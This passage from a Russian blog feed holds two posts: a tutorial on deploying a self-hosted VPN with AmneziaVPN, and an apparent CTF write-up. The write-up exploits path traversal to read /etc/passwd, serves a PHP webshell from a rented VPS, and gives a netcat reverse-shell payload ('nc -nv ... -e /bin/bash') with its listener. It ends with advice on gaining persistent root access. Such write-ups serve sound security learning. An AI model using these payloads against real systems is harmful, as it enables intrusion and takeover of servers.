  <p id="lMwK">Если кратко: VPN - это установление зашифрованного соединения между вашим устройством и сервером, на котором установлен VPN-сервис. В зависимости от сервиса будет использоваться какой-то конкретный VPN протокол, а для его работы будет использоваться какое-то конкретное приложение, которое поддерживает установление VPN соединения по этому протоколу. После установки соединения к ресурсам, на которые мы хотим зайти, заходим не мы, а наш сервер, как бы выступая посредником. Короче, в <a href="https://tenchat.ru/media/2750772-pochemu-vpn-nikogda-ne-zablokiruyut" target="_blank">статье</a> читайте, описал там.</p>
  <p id="4Rxq">Обычно такое соединение нужно для доступа к внутренним сервисам корпоративной среды, но обыватели чаще используют эту технологию чтобы получать доступ ко всяким заблокированным порнушкам, а хакеры и исследователи - для анонимности, проведения сканирований и анализа заблокированных (и не только) ресурсов.</p>
  <h3 id="a7oX">Делаем свой VPN-сервер</h3>
  <p id="G2qn">И так, первое с чего начнем - это традиционно с аренды VPS. Арендовываем Linux сервер, в моём случае Ubuntu 24.04:</p>
  <figure id="Zpzq" class="m_column">
    <img src="https://img4.teletype.in/files/72/a0/72a06d8b-6981-4d35-8858-70577ec28c13.png" width="732" />
    <figcaption>Арендованный сервер</figcaption>
  </figure>
  <p id="84Cf">В принципе вы можете найти дешёвый вариант за например 500 рублей в месяц и спокойно оплачивать сервак. А если поделитесь со своими товарищами и друзьями сервисом - можете поделить деньги на оплату и пользоваться им за сущие копейки, не боясь блокировки со стороны провайдера.</p>
  <p id="9REa">Теперь скачаем последнюю версию AmneziaVPN. Сделать это можно разными способами:</p>
  <ol id="MFDd">
    <li id="5deK">С <a href="https://amnezia.org/" target="_blank">оф. сайта</a> - но может быть заблочен в вашей стране.</li>
    <li id="mH3V">Воспользовавшись <a href="https://storage.googleapis.com/kldscp/amnezia.org/ru" target="_blank">зеркалом</a> - на случай если оф. сайт заблочен.</li>
    <li id="lRBL">Скачать с <a href="https://github.com/amnezia-vpn/amnezia-client/releases" target="_blank">GitHub</a> - там же можно глянуть <a href="https://github.com/amnezia-vpn/amnezia-client" target="_blank">исходники</a> приложения.</li>
  </ol>
  <p id="XtDt">P. S. кстати можете почитать <a href="https://docs.amnezia.org/" target="_blank">документацию</a> (возможно потребуется VPN который мы щас сделаем).</p>
  <p id="XZI8">Я буду ставить приложение на Kali, так как с виндой и андроидом думаю всё и так понятно.</p>
  <figure id="rsx4" class="m_column">
    <img src="https://img3.teletype.in/files/e4/ac/e4acc38c-206b-4a00-81df-e2d5fb59f8cb.png" width="1890" />
    <figcaption>Качаем установщик по <a href="https://github.com/amnezia-vpn/amnezia-client/releases" target="_blank">ссылке</a>.</figcaption>
  </figure>
  <p id="Itzo">Распаковываем из архивов наш файл установщика:</p>
  <figure id="08UZ" class="m_column">
    <img src="https://img4.teletype.in/files/f9/2c/f92cd120-ed3d-41d8-9e59-bd6567294ec2.png" width="1336" />
  </figure>
  <p id="dWVw">И запускаем командой: <code>./AmneziaVPN_Linux_Installer.bin</code></p>
  <p id="aNZP">В открывшемся установщике жмем далее и вводим пароль от нашего аккаунта:</p>
  <figure id="1QjX" class="m_column">
    <img src="https://img1.teletype.in/files/cf/9d/cf9d8ea1-dd5f-4eda-b5ac-2a033a8ef3e4.png" width="696" />
  </figure>
  <p id="5A8A">После установки приложения вводим в терминале команду: <code>AmneziaVPN</code></p>
  <figure id="BRNb" class="m_column">
    <img src="https://img2.teletype.in/files/52/ef/52ef3868-2fdc-4dbb-85fa-a8212d8dddce.png" width="896" />
    <figcaption>Открывшееся приложение</figcaption>
  </figure>
  <p id="z0Go">В открывшемся приложении жмем на кнопку начала и попадаем в главное меню:</p>
  <figure id="mns1" class="m_column">
    <img src="https://img4.teletype.in/files/7e/c4/7ec47871-588c-45aa-9832-4a3cf87fc363.png" width="471" />
  </figure>
  <p id="iw7F">Здесь нам предлагается:</p>
  <ol id="e4We">
    <li id="g8AW">Вставить купленный ключ на доступ к уже готовым VPN серверам от AmneziaVPN</li>
    <li id="9ire">Подключиться к бесплатным и платным (если мы вставили ключ) серверам</li>
    <li id="e5lh">Развернуть свой VPN-сервер (то чем мы сейчас и займемся)</li>
    <li id="XfTL">Восстановить конфигурацию из резервной копии - на случай если у нас уже есть готовый сервер, и мы хотим перенести root-доступ на другое устройство</li>
    <li id="2lsq">Подключиться к другому VPN-серверу, не AmneziaVPN - здесь мы можем подключиться прямо в этом приложении ко множеству других VPN-сервисов с помощью конфигурационного файла.</li>
  </ol>
  <p id="J1WW">И так, выбираем третий пункт - Self-Hosted VPN:</p>
  <figure id="XRt5" class="m_column">
    <img src="https://img2.teletype.in/files/5b/59/5b59a085-e2bd-46b0-a62f-67a362e87b3c.png" width="460" />
    <figcaption>Self-Hosted VPN</figcaption>
  </figure>
  <p id="mzQG">Здесь нам нужно вбить данные, которые мы получили, когда арендовали VPS. </p>
  <p id="g1kW">Если мы введем неверные данные, то нам выдаст ошибку:</p>
  <figure id="sV0D" class="m_column">
    <img src="https://img1.teletype.in/files/86/9f/869f7e0d-4009-4370-b46c-72e5b586208e.png" width="455" />
  </figure>
  <p id="bHFu">Что ж, тут я решил пойти не стандартно, и вместо пользователя root создал отдельного пользователя vpn, добавив его в группу sudo. Вам этого делать не обязательно, просто вставьте данные которые вам пришли после аренды сервера.</p>
  <figure id="Naqu" class="m_column">
    <img src="https://img3.teletype.in/files/ec/ce/ecceadd2-041a-4994-8a38-7a64d8ce14bf.png" width="468" />
    <figcaption>Проверяем работоспособность с другим пользователем</figcaption>
  </figure>
  <p id="RBPe">После успешного подключения нам сразу предложат установить VPN-сервис:</p>
  <figure id="v6Fo" class="m_column">
    <img src="https://img2.teletype.in/files/96/14/96140487-3b7a-4090-ac4d-0940da512ba0.png" width="459" />
  </figure>
  <ol id="Wi5T">
    <li id="OM4L">LOW - не проверял, вероятно установится что-то вроде OpenVPN сервера</li>
    <li id="2AWJ">HIGH - здесь установится модифицированная версия WireGuard под названием AmneziaWG.</li>
    <li id="xyWz">Выбрать VPN протокол - вот на него то мы и нажимаем.</li>
  </ol>
  <figure id="xxQH" class="m_column">
    <img src="https://img2.teletype.in/files/19/9f/199fe3d1-00b7-4e1a-a6f4-6af10dfa3e98.png" width="456" />
  </figure>
  <p id="mJNZ">Здесь нам выпадает список всех доступных для установки VPN сервисов. Лично я рекомендую <a href="https://github.com/EvgenyNerush/easy-xray/blob/main/README.ru.md" target="_blank">XRay</a> и <a href="https://docs.amnezia.org/ru/documentation/protocols-info#:~:text=OpenVPN%20over%20Cloak%E2%80%8B,OpenVPN%20%D0%BE%D1%82%20%D0%BE%D0%B1%D0%BD%D0%B0%D1%80%D1%83%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B8%20%D0%B1%D0%BB%D0%BE%D0%BA%D0%B8%D1%80%D0%BE%D0%B2%D0%BE%D0%BA." target="_blank">OpenVPN over Cloak</a> как наиболее продвинутые технологии VPN, с имитацией живого web-трафика, защиты от активного зондирования.</p>
  <p id="knkg">Для примера выбираю XRay:</p>
  <figure id="tzdN" class="m_column">
    <img src="https://img4.teletype.in/files/b4/05/b4052313-5a33-4514-b86a-443c4d0d9232.png" width="455" />
  </figure>
  <p id="qLmk">Здесь можем выбрать свой порт, на который будет установлен данный контейнер. Я оставлю тот что мне предложила прога и нажму <code>install</code>.</p>
  <p id="sHFx">Теперь у нас пойдет процесс установки, а в терминале можно увидеть какие команды выполняются на сервере:</p>
  <figure id="MCCJ" class="m_column">
    <img src="https://img3.teletype.in/files/23/35/23359b79-afc6-4aa4-a5e6-ee2c44a28ce8.png" width="1032" />
  </figure>
  <p id="zIfO">Наш эксперимент с другим пользователем провалился, выдав нам ошибку:</p>
  <figure id="ZMU5" class="m_column">
    <img src="https://img2.teletype.in/files/10/2b/102b1f92-9e42-47dc-afe8-6a9576fb126b.png" width="1038" />
  </figure>
  <p id="bye5">Это существенный недостаток, однако, давайте вернемся назад и укажем логин и пароль от root пользователя:</p>
  <figure id="9KXE" class="m_column">
    <img src="https://img1.teletype.in/files/05/d3/05d345c4-3666-444a-a1d4-869fdf3ab72e.png" width="461" />
  </figure>
  <p id="lvFA">В этот раз у нас успешно запустился процесс установки, ждем окончания:</p>
  <figure id="ZI1c" class="m_column">
    <img src="https://img4.teletype.in/files/3e/94/3e94fa61-599a-4089-a3ef-34ec85ad987a.png" width="1025" />
  </figure>
  <p id="dVNB">По окончании нас будет ждать такое окно:</p>
  <figure id="CCJ3" class="m_column">
    <img src="https://img2.teletype.in/files/5d/97/5d97ab83-7333-4113-a62d-7ccd2590fa1f.png" width="485" />
  </figure>
  <p id="uRaj">Кнопка подключения подключит нас к VPN.</p>
  <p id="wq8K">Кнопка поделиться даст нам возможность дать доступ нашим товарищам, при этом не давая доступ на администрирование сервером.</p>
  <figure id="diMn" class="m_column">
    <img src="https://img1.teletype.in/files/44/1d/441d730e-945c-48e2-bbe5-0fff477321c1.png" width="461" />
  </figure>
  <p id="aSpK">В настройках можем сделать резервную копию, а также доустановить другие сервисы на сервер</p>
  <figure id="LZPj" class="m_column">
    <img src="https://img1.teletype.in/files/c6/94/c694ffa0-93b8-4df6-b3b3-f4000ae0e161.png" width="482" />
  </figure>
  <p id="QksV">Для примера откроем первое окно Servers, выберем наш сервер и установим туда Tor сайт.</p>
  <figure id="14sH" class="m_column">
    <img src="https://img2.teletype.in/files/18/ac/18ac39b4-6dff-4526-8012-09d96479d2e6.png" width="470" />
  </figure>
  <p id="FJC7">После установки можем зайти и получить ссылку на наш сайт в darknet:</p>
  <figure id="AOML" class="m_column">
    <img src="https://img4.teletype.in/files/38/9f/389f59ab-c5d4-4ad2-aa1c-da15dd8995a2.png" width="465" />
  </figure>
  <p id="Oc24">Если что работает на WordPress. Заходим по ссылке и устанавливаем сайт:</p>
  <figure id="o90X" class="m_column">
    <img src="https://img3.teletype.in/files/a8/e9/a8e940d5-75be-4cc4-acce-b51babdd8078.png" width="1909" />
  </figure>
  <p id="LOxo">В окне управления можем перезапустить наш сервер, удалить все сервисы со следами с нашего сервера, и удалить сервер из приложения (сам сервер останется):</p>
  <figure id="DvHB" class="m_original">
    <img src="https://img2.teletype.in/files/9c/12/9c127408-44c4-43aa-af19-874287a83102.png" width="477" />
  </figure>
  <p id="Yyhe">Ну вот собственно и всё. VPN получен, остальные функции оставлю вам на самостоятельное изучение. Продукт годный и лично мне за его удобства очень понравился. Функции реализованы за счёт готовых docker контейнеров.</p>
  <figure id="Vipp" class="m_column">
    <img src="https://img3.teletype.in/files/a5/0d/a50ddaf6-a81e-4298-b9c3-4d731fb30e8e.png" width="1825" />
  </figure>
  <p id="4KKI">Тестируем на whoer.net наш vpn пока не добьемся желаемого результата. Для этого меняем доступные VPN-сервисы и VPS провайдеров, а также расположение сервера и настройку своей системы (или меняем систему в целом, <a href="https://www.digi77.com/linux-kodachi/" target="_blank">например</a>).</p>
  <figure id="fKCe" class="m_column">
    <img src="https://img1.teletype.in/files/09/13/09132b71-e73f-458f-94b8-f3dbfe04af0d.png" width="1436" />
  </figure>
  <h3 id="VJTK">Выводы</h3>
  <p id="xAPA">AmneziaVPN отлично подойдет тем, кто не прошарен в IT сфере или просто не хочет особо заморачиваться с развертыванием столь обывательских инструментов.</p>
  <p id="ZmdV">Данное решение позволяет автоматизировано развернуть большое количество сервисов, однако не даёт возможности гибкой настройки и подключения к серверу не под root пользователем - что значительный минус.</p>
  <p id="wQPw">Сервисы упакованы в docker контейнеры. Такая изоляция гарантирует дополнительную безопасность.</p>
  <p id="9Lvr">Как итог - годная штука для тех кто не силён в самостоятельном развертывании сервисов на Linux серверах, а также для тех, кто хочет изучить и быть может даже помочь в разработки подобных решений.</p>
  <figure id="EUTb" class="m_column">
    <img src="https://img2.teletype.in/files/de/7e/de7e9a93-f052-48fb-bf38-ed08c12a2885.png" width="1533" />
  </figure>
  <p id="ZJfZ">Благодарю за прочтение статьи.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/path-traversal</guid><link>https://teletype.in/@hunterghoul_team/path-traversal?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/path-traversal?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>Write-up - эксплуатируем Path Traversal и уязвимость command injection</title><pubDate>Sun, 03 Nov 2024 19:38:17 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/1a/9a/1a9ad793-69d2-4107-a181-39abb499e3a7.png"></media:content><category>Hacking</category><description><![CDATA[<img src="https://img1.teletype.in/files/c7/1d/c71dc56d-398b-4191-8e32-fe8d0948a92a.png"></img>Всем привет! Сегодня мы будем ломать сайт приватного канала, который выглядит вот так:]]></description><content:encoded><![CDATA[
  <h3 id="id5X">Дисклеймер</h3>
  <p id="CNfD">Информация ниже предоставлена в ознакомительных целях. Ответственность за все действия несёте исключительно вы. Автор настоятельно рекомендует не нарушать действующие законодательства стран и использовать полученную информацию в образовательных целях.</p>
  <h3 id="zOEM">Введение</h3>
  <p id="GiEd">Всем привет! Сегодня мы будем ломать сайт приватного канала, который выглядит вот так:</p>
  <figure id="wkCB" class="m_column">
    <img src="https://img1.teletype.in/files/c7/1d/c71dc56d-398b-4191-8e32-fe8d0948a92a.png" width="1920" />
    <figcaption>Стартовая страница сайта</figcaption>
  </figure>
  <h3 id="hIhu">Начало анализа web-приложения</h3>
  <p id="RTGL">Первое, с чего начинается взлом сайта - проверка его функционала, то, с чем мы будем в последующем работать. Так что давайте как тут и задумано, попробуем вставить URL какой-нибудь картинки из интернета.</p>
  <figure id="55hy" class="m_column">
    <img src="https://img4.teletype.in/files/bb/70/bb70782c-aa8b-4b2d-b561-db741af1efdd.png" width="1920" />
    <figcaption>&quot;Картинка&quot; из интернета</figcaption>
  </figure>
  <p id="hBkL">Как видим, вместо отображения картинки, нам отобразилась её внутренность, т.е. как бы выполнилась команда cat (прочтение содержимого файла). Интересный момент, стоит обратить на него внимание.</p>
  <p id="2iOf">P. S. кстати, если бы мы вставили ссылку какого-то сайта, то у нас отобразился сайт, типо как в <code>&lt;iframe&gt;</code> html теге. Это важно, так как это нам даёт понять, что сервер принимать в качестве url не только адрес картинки, но и любой другой url адрес, что может позволить нам выполнить атаку типа <a href="https://blog.skillfactory.ru/glossary/csrf/" target="_blank">CSRF</a> (затрудняюсь ответить правильное название в данном случае).</p>
  <p id="Uu6X">Теперь обращаем внимание на то, что наша ссылка в URL браузера вставилась после вызова php функции <code>?file_url</code> (в php, функции следуют после символа ?). Давайте попробуем туда написать вместо URL картинки например слово <code>test</code>.</p>
  <figure id="jBtJ" class="m_column">
    <img src="https://img4.teletype.in/files/3f/a1/3fa14896-8e9d-4e2a-9f10-61f136b18abb.png" width="1920" />
    <figcaption>Вписываем незапланнированный пользовательский ввод</figcaption>
  </figure>
  <p id="r1wM">Видим что наш запрос успешно выполнен, ошибок нет. Возможно, стоит попробовать ввести какую-то команду? Но прежде мы с вами погрузимся в небольшую теорию...</p>
  <h3 id="weNX">Краткий экскурс в мир Линуса Торвальдса</h3>
  <p id="cn62">В Linux системах есть встроенная программа - cd (change directory, от англ. &quot;выбрать папку&quot;).</p>
  <p id="CdLq">Суть данной (как и остальных, но об этом как-нибудь в отдельной статье по линукс) программы в том, чтобы просто перемещать нас по нужным папкам.</p>
  <p id="ydmI">Как происходит выбор папки.</p>
  <p id="qXj1">В терминале необходимо прописать команду:</p>
  <p id="tOFu"><code>cd путь_до_папки</code></p>
  <p id="ahKv">А теперь внимание - существует <u>абсолютный</u> и <u>относительный</u> путь.</p>
  <p id="GLBJ">Абсолютный путь - это когда мы начинаем с корневой директории (как правило с самой первой директории на жестком диске) и спускаемся в нам нужную.</p>
  <p id="zOOw">Например:</p>
  <p id="2VxP"><code>cd /home/user1/Desktop/top_secret/</code></p>
  <p id="elJa">В данном случае мы с вами после запуска программы cd переходим с помощью ввода / в корневой каталог. Затем вводим там папку home и с помощью / заходим уже в неё. Таким образом доходим до нужной директории, в конце ставим / чтобы выбрать её и готово. Мы с вами попадаем в папку <code>top_secret</code> пользователя <code>user1</code> и можем делать с её содержимым что хотим.</p>
  <p id="Ecf2">Относительный путь - это когда мы хотим переместиться на директорию выше или во вложенную директорию относительно той, в которой мы сейчас находимся</p>
  <p id="Ra0x">Например:</p>
  <p id="7Hch">cd ./lib/tools/</p>
  <p id="3ayk">cd ../magic/env/</p>
  <p id="8eEp">cd ../../home/user2/test/</p>
  <p id="WKq0">Как вы уже заметили, здесь появились некие точки (одна и две). Что значит этот айтишный заговор? А значит он следующее: одна точка - это текущая папка; две точки - это папка уровнем выше, т.е. как бы вернуться на папку назад, в которую вложена наша.</p>
  <p id="s1Vu">Таким образом слеш &lt;/&gt; отделяет папки друг от друга, выполняет функцию перехода в папку. Знаки точек выполняют функцию ссылок, одна точка - текущая папка; две точки - папка повыше.</p>
  <p id="yNIr">И так, возвращаемся к нашему сайту.</p>
  <figure id="JmnX" class="m_column">
    <img src="https://img4.teletype.in/files/b6/85/b685cf1d-bba9-4f68-a61c-e839a467a45f.png" width="1920" />
    <figcaption>Просматриваем файл с пользователями linux</figcaption>
  </figure>
  <p id="F5Vb">Здесь мы пошли на хитрость и попробовали открыть файл <code>passwd</code> с пользователями, который по умолчанию хранится в линуксах в папке <code>/etc/</code>.</p>
  <p id="lIZp">В данном случае методом тыка мы обнаружили уязвимость Path traversal. Path traversal - это уязвимость приложений, заключающаяся в возможности выхода за пределы директории и чтения произвольных файлов на сервере.</p>
  <p id="X2FK">Читать этот файл (опять же как правило) могут все, и важный момент - мы  используем именно относительный путь, поскольку абсолютный как правило не сработает по ряду определенных причин.</p>
  <p id="tjtR">По сути то что нам открылось содержимое файла уже говорит о многом. В Bug Bounty нам бы уже дали заслуженную денюжку и мы сидели пили чаёк. Но мы отбитые хацкеры, потому нам интересен процесс взлома, а не баги и уязвимости. Продолжаем ломать <s>голову</s> систему.</p>
  <h3 id="Fd9E">Payload - ищем способ доставки полезной нагрузки</h3>
  <p id="9eUs">И так, попробуем вместо картинки заслать сайту специальный webshell. Лично я не силён в познаниях ЯП PHP, так что, воспользуемся <a href="https://t.me/hunterghoulchat/32" target="_blank">готовым</a> вариантом из моего Telegram <a href="https://t.me/hunterghoul_team" target="_blank">канала</a>. Это простой и прикольный php webshell, который позволит нам выполнить код прямо на странице сайта. </p>
  <p id="uHqd">Хорошо, у нас есть готовый payload, теперь его нужно как-то доставить. В нашем случае сайт принимает на ввод URL адрес. Значит нам нужно публично выложить наш payload в интернет и получить на него прямую ссылку (вы же помните про NAT из <a href="https://t.me/hunterghoul_team/16" target="_blank">прошлой статьи</a>, так что придется похимичить).</p>
  <p id="q5Ug">Здесь можно было бы попробовать подходящие файлообменники. Можно было бы попробовать с нашей системы дать публичную ссылку с помощью, например, программы <a href="https://ngrok.com/" target="_blank">ngrok</a>. Но мы с вами поступим другим способом - арендуем VPS.</p>
  <figure id="XSNz" class="m_column">
    <img src="https://img2.teletype.in/files/da/94/da9409b8-ea4b-4ccc-bf91-ae63a78c04fc.png" width="1095" />
    <figcaption>Арендованный VPS</figcaption>
  </figure>
  <p id="Xkvl">Итак, дедик (dedicated server, от англ. выделенный сервер) мы с вами взяли, подключаемся к нему по ssh.</p>
  <p id="7JFc">Подключившись, установим на него web-сервер, который бы позволил нам получить URL адрес на наш payload. Например Apache.</p>
  <figure id="8xo6" class="m_column">
    <img src="https://img2.teletype.in/files/de/76/de764ee0-f300-4dfb-9009-3f60c2f35fbf.png" width="812" />
    <figcaption>Устанавливаем apache2</figcaption>
  </figure>
  <p id="Ez1u">Команда для установки простая: <code>apt install apache2</code>.</p>
  <p id="JImU">После этого файлы нашего сайта будут располагаться в папке <code>/var/www/html/</code>.</p>
  <p id="KgoY">Переходим туда, удаляем дефолтные файлы.</p>
  <p id="FCJR">Создаем новый файл, назовем его например webshell.php и копируем туда содержимое того, что вы скачали выше с моего канала.</p>
  <figure id="Qgt0" class="m_column">
    <img src="https://img2.teletype.in/files/18/df/18dfe99f-09e3-4dc2-bc69-4d26d2fb034e.png" width="792" />
    <figcaption>Создаём файл webshell.php</figcaption>
  </figure>
  <figure id="lL91" class="m_column">
    <img src="https://img4.teletype.in/files/b4/52/b4524e6f-7c76-4090-a696-7d19072125ab.png" width="803" />
    <figcaption>Вставляем содержимое нашего payload в файл</figcaption>
  </figure>
  <p id="vr8Q">Команда простая: <code>nano webshell.php</code></p>
  <p id="NSpg">Далее просто ctrl+c, ctrl+v. И для того чтобы сохранить пишем ctrl+o, подтверждаем запись данных нажав на Y. После этого выходим из редактора нажав на ctrl+x. Подробнее как пользоваться редактором nano можете почитать <a href="https://losst.pro/tekstovyj-redaktor-nano-v-linux-dlya-novichkov" target="_blank">тут</a>.</p>
  <p id="J6RI">Так как мы создали этот файл по пути <code>/var/www/html/webshell.php</code>, то он теперь у нас доступен в интернете по адресу <code>http://ip_сервера/webshell.php</code>.</p>
  <figure id="bxbX" class="m_column">
    <img src="https://img3.teletype.in/files/2a/c4/2ac4e073-cd8b-4b11-b561-b9ff98d9b066.png" width="1918" />
    <figcaption>Проверяем доступность файла</figcaption>
  </figure>
  <p id="NrIA">Перейдя видим, что наш шелл (shell, от англ. оболочка) работает. Если бы на нашем сервере был установлен php, то мы смогли бы выполнять linux команды прямо здесь, введя их в строку и нажав на <code>Execute</code> (от англ. выполнить). А в графе <code>Output</code> (от англ. вывод) появился бы вывод результата выполненной команды, в случае, если эта команда успешно выполнилась.</p>
  <p id="ARq0">Что ж, остаётся только кинуть ссылку на наш атакуемый сайт и кайфануть от сработавшей оболочки, и, о нет...</p>
  <figure id="KDxv" class="m_column">
    <img src="https://img4.teletype.in/files/74/be/74be3aff-397d-4047-825f-42d788be0ee7.png" width="1920" />
    <figcaption>Error</figcaption>
  </figure>
  <p id="D85g">Оказывается .php файлы наш сайт не хочет принимать. Что ж, в таком случае попробуем снова пойти на хитрость и переименуем наш файл с .php на .html расширение.</p>
  <figure id="P7l5" class="m_column">
    <img src="https://img4.teletype.in/files/3d/7e/3d7e0b52-6262-4039-9af8-8ad5eed011a4.png" width="807" />
    <figcaption>Переименовываем файл</figcaption>
  </figure>
  <p id="jblb">Делается это командой: <code>mv webshell.php webshell.html</code>.</p>
  <p id="DXn3">Вообще команда mv служит для перемещения файлов, но также ей таким образом можно и переименовать файл как в нашем случае, но об этом как-нибудь в другой раз.</p>
  <p id="OoYs">Пробуем ещё раз:</p>
  <figure id="7DHq" class="m_column">
    <img src="https://img3.teletype.in/files/ad/aa/adaa4128-c8e6-40ba-b386-a94bafe1bf0f.png" width="1920" />
    <figcaption>Успех</figcaption>
  </figure>
  <p id="ZIRj">И о да, оболочка запустилась.</p>
  <p id="F5WB">Вы вероятно можете задаться вопросом - а как мы запустили php файл переименованный в html???</p>
  <p id="9oer">Всё просто - при определенной настройке web-сервера он начинает считывать html файлы как php файлы. Сделано это для того чтобы сервер мог выполнять встроенный в html код ЯП PHP. В нашем случае такая настройка сервера привела нас к возможности выполнить свой произвольный код.</p>
  <p id="E6HG">Теперь давайте выполним пару команд и получим флаг.</p>
  <figure id="q2ce" class="m_column">
    <img src="https://img3.teletype.in/files/e3/94/e394e5ec-a6cb-42e6-9499-4737ba66b323.png" width="1920" />
    <figcaption>PWD - где мы?</figcaption>
  </figure>
  <p id="OcCH">Узнаем в какой мы сейчас папке с помощью команды: <code>pwd</code></p>
  <p id="jbsF">Теперь с помощью команды <code>ls</code> посмотрим список файлов в нашей текущей папке и команды <code>cat</code> прочитаем их содержимое:</p>
  <figure id="Fopc" class="m_column">
    <img src="https://img4.teletype.in/files/b3/89/b389cfa5-17f0-4b94-abd8-23f00d35e9fb.png" width="1920" />
    <figcaption>Команда ls</figcaption>
  </figure>
  <figure id="UKgG" class="m_column">
    <img src="https://img3.teletype.in/files/6e/83/6e834ea9-94ee-4a9c-86d2-c2e0d40b6349.png" width="1920" />
    <figcaption>Команда cat</figcaption>
  </figure>
  <p id="bZFJ">Ну и почитав содержимое файла, видим здесь наш флаг (выделен мышкой).</p>
  <figure id="4KhP" class="m_column">
    <img src="https://img4.teletype.in/files/b7/bd/b7bdf0e9-597d-46f0-b151-6848cc45d80f.png" width="1920" />
    <figcaption>Флаг в php файле сайта</figcaption>
  </figure>
  <p id="2d9C">В реальности же изучать файлы сайта очень важно для нахождения различных api, логинов и паролей от баз данных, скрытых комментариев и так далее.</p>
  <h3 id="w8e0">Получаем netcat shell в терминале</h3>
  <p id="XxXt">И так, задачка решена, но, на самом деле можно получить удаленный доступ к серверу и с помощью привычного терминала. Для этого создадим другой payload со <a href="https://t.me/hunterghoulchat/31" target="_blank">следующим</a> содержимым:</p>
  <p id="Tj4c"><code>&lt;?php system(&quot;nc -nv ip_нашего_сервера 4444 -e /bin/bash&quot;);?&gt;</code></p>
  <figure id="XErm" class="m_column">
    <img src="https://img2.teletype.in/files/54/cf/54cf3d8d-d02a-4e25-b8bc-285f2e5f6607.png" width="807" />
    <figcaption>Наш payload</figcaption>
  </figure>
  <p id="F3sW">Разберем кратко что тут есть:</p>
  <ol id="0rOJ">
    <li id="4irZ">nc -nv - запускает программу netcat, которая выполнит запрос по следующему далее ip и порту</li>
    <li id="vlZc">90.156.x.x - ip адрес нашего арендованного VPS (ну или наш если мы оформили статический/белый ip у нашего интернет-провайдера)</li>
    <li id="rcb6">4444 - порт, по которому будет подключаться удаленный сервер к нашему серверу. Может быть любой не занятый, например 1604 или 1111, главное чтобы на обоих серверах он был свободен, не блокировался файрволлом и был одинаковый.</li>
    <li id="HVir">-e /bin/bash - тут мы просим после установления подключения запустить оболочку bash, которая у всех linux по умолчанию есть. Если нет, то можно заменить на например /bin/sh </li>
  </ol>
  <p id="ukCv">Сохраняем payload на нашем сервере, копируем ссылку на него, и далее снова на нашем сервере выполняем следующую команду:</p>
  <p id="Vrrm"><code>nc -lvnp 4444</code></p>
  <figure id="1mEL" class="m_column">
    <img src="https://img2.teletype.in/files/19/06/1906af5e-403e-45e5-80ce-514f32144cf8.png" width="822" />
    <figcaption>Запускаем лисенер (прослушивалку трафика)</figcaption>
  </figure>
  <p id="wAXr">Здесь мы говорим нашему серверу ждать, пока кто-то к нам подключится по порту 4444 (или по другому, который мы вписали в payload. Главное чтобы был одинаковый).</p>
  <p id="WhC8">Ну что, зашлем снова ссылку на наш payload серверу и увидим, что он как бы &quot;завис&quot; в обработке нашего запроса:</p>
  <figure id="DfyU" class="m_column">
    <img src="https://img1.teletype.in/files/03/1e/031ee20f-ecc5-4791-adb7-5df4774af7c9.png" width="1920" />
    <figcaption>Установленное подключение. Выглядит как &quot;зависший&quot; запрос сервера.</figcaption>
  </figure>
  <p id="8d0P">Проверяем терминал нашего сервера и ура - видим успешное подключение к серверу. Сразу введем следующие команды:</p>
  <ol id="AzAM">
    <li id="V9xH"><code>id</code> - посмотрим от имени какого пользователя мы получили доступ</li>
    <li id="vRNQ"><code>script /dev/null -c bash</code> - здесь мы делаем более удобную для себя оболочку. Такой как бы псевдо-bash, чтобы мы видели в какой папке находимся и от имени какого пользователя, хоть это и не заменяет полноценного подключения к оболочке, например по ssh.</li>
  </ol>
  <figure id="ZPJw" class="m_column">
    <img src="https://img2.teletype.in/files/9d/77/9d77aa08-2346-445c-b1c1-d4c4a9f06540.png" width="798" />
    <figcaption>Успешное получение удаленного shell</figcaption>
  </figure>
  <p id="g9i4">Выполним каких-нибудь пару команд:</p>
  <figure id="VGWX" class="m_column">
    <img src="https://img2.teletype.in/files/14/b2/14b2294f-0979-459e-aad3-b1f392cf2617.png" width="812" />
    <figcaption>Видим не назначенную домашнюю директорию и наличие группы пользователей sudo</figcaption>
  </figure>
  <p id="vk94">Здесь видим что есть установленная программа sudo - с её помощью можно было бы попробовать получить полный доступ над сервером, например с помощью команды: <code>sudo -i</code>. Но это не этот случай.</p>
  <p id="Qw2C">Здесь мы можем вывести содержимое того же файла и получить флаг:</p>
  <figure id="1V93" class="m_column">
    <img src="https://img1.teletype.in/files/cd/50/cd50b52d-7014-4cef-9da8-0d51dba31240.png" width="878" />
    <figcaption>Получение флага в терминале</figcaption>
  </figure>
  <h3 id="AjOD">Выводы</h3>
  <p id="oVzt">При взломе web-приложения следует начать с попыток осмыслить принцип работы тех или иных его функций, отвечающих за выполнение каких-то операций на web-сервере.</p>
  <p id="7LiI">Взлом web-приложения может быть осуществлён как с помощью манипуляции с запросами (как например в одной из прошлых <a href="https://t.me/hunterghoul_team/24" target="_blank">статей</a>), так и с помощью более сложных атак, как в данном случае. </p>
  <p id="AlP1">В любом случае после успешного взлома и получения доступа к терминалу удаленного сервера, постарайтесь проанализировать файлы сайтов, программу sudo и прочие возможности закрепиться в системе.</p>
  <p id="5RoU">Запомните, основная задача при проведении атаки - открыть себе постоянный удаленный доступ, в идеале найдя логин:пароль или создав нового пользователя с root правами для подключения по ssh.</p>
  <p id="fuWF">Благодарю за прочтение статьи.</p>

